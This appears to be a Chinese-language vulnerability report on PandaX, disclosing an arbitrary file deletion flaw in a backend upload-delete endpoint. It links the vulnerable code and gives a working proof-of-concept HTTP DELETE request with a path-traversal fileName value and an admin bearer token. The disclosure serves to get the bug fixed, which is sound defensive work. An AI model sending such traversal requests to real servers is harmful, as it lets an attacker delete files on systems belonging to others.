[fix] 修复任意文件删除

[L1nyz-tel]

[L1nyz-tel]

pandax 任意文件删除

后台一处接口存在任意文件删除

定位到代码位置 apps/system/router/upload.go#40

https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/upload.go#L40-L45

删除图片的处理函数具体实现为

https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/api/upload.go#L52-L57

这里即可以直接跨目录删除任意文件

DELETE http://127.0.0.1:7788/upload/delete?fileName=../../../../../../../../../tmp/1.txt HTTP/1.1
Host: 127.0.0.1:7788
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Origin: http://127.0.0.1:7788
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q
If-Modified-Since: Sat, 09 Mar 2024 08:08:22 GMT
Connection: close
Content-Length: 0